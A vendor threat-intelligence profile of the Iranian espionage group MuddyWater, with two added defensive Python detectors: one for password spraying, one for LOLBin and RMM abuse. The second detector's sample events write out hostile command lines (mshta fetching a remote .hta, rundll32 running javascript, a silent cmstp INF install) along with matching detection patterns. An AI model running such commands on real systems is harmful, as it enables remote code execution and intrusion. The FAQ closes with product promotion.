MuddyWater
MuddyWater is an Iranian state-sponsored cyber espionage group linked to the Ministry of Intelligence and Security (MOIS) that conducts global intelligence collection through spear-phishing, vulnerability exploitation, and increasingly sophisticated custom command-and-control infrastructure.

Origins of MuddyWater
MuddyWater, also tracked as STATIC KITTEN, Earth Vetala, Seedworm, TA450, MERCURY, and Mango Sandstorm, is a cyber espionage group assessed to operate under Iran’s Ministry of Intelligence and Security (MOIS). Active since at least 2017, the group conducts intelligence collection operations against government, academic, defense, telecommunications, and energy organizations worldwide.
Recent research in 2026 revealed operational infrastructure belonging to MuddyWater hosted on a Netherlands-based VPS, which exposed extensive operational artifacts including command-and-control (C2) frameworks, scripts, victim data, and operational logs. Analysis of this infrastructure confirmed that MuddyWater operates multiple internally developed C2 frameworks and leverages a wide ecosystem of open-source tools to support reconnaissance, exploitation, and data exfiltration operations.
The group demonstrates a hybrid operational approach: combining custom-developed malware frameworks, public exploit code, and legitimate administrative tools to maintain access and evade detection. Recent campaigns also demonstrate experimentation with blockchain-based command-and-control mechanisms, highlighting MuddyWater’s evolving technical capabilities.
Targeted countries
MuddyWater campaigns span multiple regions including the Middle East, Europe, North America, and Central Asia. Recent activity has targeted organizations in Israel, Jordan, Egypt, the United Arab Emirates, Portugal, and the United States, alongside historical operations against entities in Turkey, Iraq, Pakistan, Saudi Arabia, Germany, India, Afghanistan, and Armenia.
Targeted industries
MuddyWater targets organizations across numerous sectors including government, telecommunications, defense, academic institutions, aviation, healthcare, energy, financial services, NGOs, and technology companies. The group also targets critical infrastructure and organizations involved in immigration, intelligence, and identity systems, indicating a strong focus on intelligence collection.
Known victims
Recent operations identified targets including:
- Israeli healthcare organizations, hosting providers, and immigration-related services
- Jordanian government webmail infrastructure
- UAE engineering and energy companies
- Egyptian aviation organizations, including EgyptAir
- NGOs connected to Israeli and Jewish communities
- A Portuguese government-related immigration system
The targeting aligns closely with Iranian intelligence priorities, including geopolitical, diplomatic, and regional strategic interests.
MuddyWater's attack methods

MuddyWater gains access through spear-phishing emails, exploitation of public-facing applications, password spraying, and vulnerability exploitation. Recent campaigns leveraged vulnerabilities in Fortinet, Ivanti, Citrix, BeyondTrust, and SolarWinds N-Central, as well as SQL injection vulnerabilities in web applications.

The group frequently escalates privileges through techniques such as UAC bypass, exploitation of edge device vulnerabilities, and administrative account creation, including the creation of persistent FortiGate administrator accounts during exploitation.

Defense evasion includes code obfuscation, encrypted payloads, steganography, and masquerading as legitimate services. MuddyWater also hides C2 infrastructure behind compromised websites, proxy networks, and decentralized infrastructure such as blockchain-based C2 resolution.

Credential theft is performed with tools such as Mimikatz, LaZagne, and Browser64, and through password spraying attacks targeting Outlook Web Access and SMTP services.
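Password spraying against a webmail login stands out from brute force by its shape: one source, many accounts, very few attempts per account. The following detection over a constructed OWA/SMTP authentication log is an added example and not code from the original page; the log format, the IP addresses and the account names are all constructed for illustration.

```python
"""Password-spray detection for OWA/SMTP authentication logs. Added example,
not from the original page; input is a constructed, simplified log of
"timestamp source_ip username outcome" lines."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample (documentation IP ranges): 203.0.113.7 sprays one guess
# across many accounts, 198.51.100.2 hammers a single account.
SAMPLE_LOG = """\
2026-01-10T08:00:01Z 203.0.113.7 alice@example.test FAIL
2026-01-10T08:00:03Z 203.0.113.7 bob@example.test FAIL
2026-01-10T08:00:05Z 203.0.113.7 carol@example.test FAIL
2026-01-10T08:00:07Z 203.0.113.7 dave@example.test FAIL
2026-01-10T08:00:09Z 203.0.113.7 erin@example.test FAIL
2026-01-10T08:00:11Z 203.0.113.7 frank@example.test SUCCESS
2026-01-10T08:01:00Z 198.51.100.2 alice@example.test FAIL
2026-01-10T08:01:05Z 198.51.100.2 alice@example.test FAIL
2026-01-10T08:01:10Z 198.51.100.2 alice@example.test FAIL
"""

def parse(log_text):
    events = []
    for line in log_text.splitlines():
        ts, ip, user, outcome = line.split()
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ip, user, outcome))
    return events

def detect_spray(events, window=timedelta(minutes=10), min_users=5, max_per_user=2):
    """{source_ip: sorted accounts} for sources whose failures within any `window`
    hit >= min_users accounts, <= max_per_user tries each (spray, not brute force)."""
    fails_by_ip = defaultdict(list)
    for ts, ip, user, outcome in events:
        if outcome == "FAIL":
            fails_by_ip[ip].append((ts, user))
    hits = {}
    for ip, fails in fails_by_ip.items():
        fails.sort()
        for i, (start, _) in enumerate(fails):   # slide the window over this source's failures
            per_user = defaultdict(int)
            for ts, user in fails[i:]:
                if ts - start <= window:
                    per_user[user] += 1
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                hits[ip] = sorted(per_user)
                break
    return hits

def successes_from_sprayers(events, hits):
    """Accounts that logged in successfully from a spraying source: reset first."""
    return sorted({u for _, ip, u, o in events if ip in hits and o == "SUCCESS"})
```

The single-account hammering from the second source is deliberately not reported here; it needs a separate lockout-style rule, while the spray rule's per-user ceiling is what keeps the two apart.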

Malware deployed by MuddyWater gathers system information, domain membership, running processes, security software presence, and network configuration to map the victim environment.

The group commonly leverages remote monitoring and management (RMM) tools such as ScreenConnect, Atera Agent, SimpleHelp, and Remote Utilities to move laterally across compromised environments.

Sensitive information is collected from compromised systems including documents, credential databases, screenshots, and locally stored files. In recent campaigns, data included passport scans, visa records, financial documents, and biometric system configurations.

Payload execution is typically performed using PowerShell, Windows Command Shell, JavaScript, Python, and Visual Basic scripts, often executed via legitimate system utilities such as mshta, rundll32, or CMSTP.
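The utilities named above are legitimate Windows binaries, so the useful signal is the combination of image, command line and parent process, not the binary alone. The following triage over constructed process-creation events (a simplified "image|command line|parent" form, not real Sysmon output) is an added example and not code from the original page; the RMM binary name substrings are assumptions to be checked against the organization's own approved-RMM inventory.

```python
"""Flag script execution through mshta, rundll32 and CMSTP, and the RMM agents
named above, in process-creation telemetry. Added example, not from the page;
event format is a constructed, simplified Sysmon-style "image|cmdline|parent"."""
import re

# Constructed sample events (not real telemetry; 203.0.113.9 is a documentation address).
SAMPLE_EVENTS = [
    r"C:\Windows\System32\mshta.exe|mshta.exe https://203.0.113.9/notice.hta|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    r'C:\Windows\System32\rundll32.exe|rundll32.exe javascript:"..\mshtml,RunHTMLApplication"|C:\Windows\System32\cmd.exe',
    r"C:\Windows\System32\cmstp.exe|cmstp.exe /ni /s C:\Users\Public\profile.inf|C:\Windows\System32\cmd.exe",
    r"C:\Windows\System32\rundll32.exe|rundll32.exe shell32.dll,Control_RunDLL intl.cpl|C:\Windows\explorer.exe",
    r"C:\Program Files (x86)\ScreenConnect Client (abc123)\ScreenConnect.ClientService.exe|ScreenConnect.ClientService.exe|C:\Windows\System32\services.exe",
    r"C:\Windows\System32\notepad.exe|notepad.exe report.txt|C:\Windows\explorer.exe",
]

# (rule name, image regex, command-line regex): the benign rundll32 control-panel
# launch above matches the image but not the command line, so it stays quiet.
LOLBIN_RULES = [
    ("mshta_remote_or_script", r"\\mshta\.exe$", r"https?://|vbscript:|javascript:|\.hta\b"),
    ("rundll32_script", r"\\rundll32\.exe$", r"javascript:|vbscript:"),
    ("cmstp_inf_install", r"\\cmstp\.exe$", r"/ni\b.*\.inf|/s\b.*\.inf"),
]
# Substrings of RMM agent paths (assumption: none are approved in this environment,
# so any appearance is flagged for review against the RMM inventory).
RMM_MARKERS = ("screenconnect", "ateraagent", "simplehelp", "rutserv")
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")

def evaluate(event):
    """Return the list of rule names an event triggers ([] when clean)."""
    image, cmdline, parent = event.split("|")
    findings = [name for name, image_re, cmd_re in LOLBIN_RULES
                if re.search(image_re, image, re.I) and re.search(cmd_re, cmdline, re.I)]
    if findings and parent.lower().endswith(OFFICE_PARENTS):
        findings.append("office_parent")   # LOLBin spawned by a document: lure was opened
    if any(marker in image.lower() for marker in RMM_MARKERS):
        findings.append("rmm_agent")
    return findings

def triage(events):
    """Map event index -> findings for every event that triggered something."""
    return {i: f for i, e in enumerate(events) if (f := evaluate(e))}
```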

Data exfiltration occurs through several mechanisms including:
- Custom C2 channels
- Cloud storage platforms such as Wasabi S3 and put.io
- Amazon EC2 servers
- Lightweight HTTP file servers
- Command-and-control channels using HTTP, DNS, and WebSockets

MuddyWater operations are primarily focused on covert intelligence gathering, with stolen data including government communications, personal identity documents, organizational records, and internal communications.
TTPs used by MuddyWater
How to detect with Vectra AI
A list of detections available on the Vectra AI platform that indicate APT attacks.
Frequently asked questions (FAQ)
Who is behind MuddyWater?
MuddyWater is attributed to Iran's Ministry of Intelligence and Security (MOIS).
What are MuddyWater's main attack vectors?
Spear-phishing emails containing malicious attachments or links, and exploitation of publicly exposed vulnerabilities.
How does MuddyWater evade defenses?
They employ a variety of obfuscation techniques, legitimate tools, steganography, and DLL side-loading.
Which malware tools are associated with MuddyWater?
POWERSTATS, NTSTATS, CloudSTATS, PowGoop, Blackwater, ForeLord, MoriAgent, and others.
Which industries does MuddyWater target?
Telecommunications, defense, academia, oil and gas, healthcare, technology, NGOs, government agencies, and others.
What tools can detect MuddyWater activity?
Organizations should leverage advanced network detection and response (NDR) solutions such as Vectra AI.
What can organizations do to defend against MuddyWater attacks?
Organizations should apply security patches promptly, educate users about spear-phishing and phishing awareness, enforce multi-factor authentication, and closely monitor network traffic and user activity.
Does MuddyWater exploit vulnerabilities?
Yes, it exploits vulnerabilities such as CVE-2020-0688 (Microsoft Exchange), CVE-2017-0199 (Office), and CVE-2020-1472 (Netlogon).
Does MuddyWater operate globally?
While the Middle East and Asia are its primary areas of activity, MuddyWater targets entities worldwide, including in North America and Europe.
How can organizations detect MuddyWater's lateral movement?
Organizations can effectively detect lateral movement associated with MuddyWater by leveraging advanced network detection and response (NDR) solutions such as Vectra AI. Vectra AI uses artificial intelligence and machine learning algorithms to continuously monitor network traffic and rapidly identify anomalous behavior such as unauthorized use of remote access tools, suspicious internal connections, and unexpected credential usage patterns. By providing real-time visibility and prioritized threat alerts, Vectra AI empowers security teams to quickly identify and contain MuddyWater threats before serious damage occurs.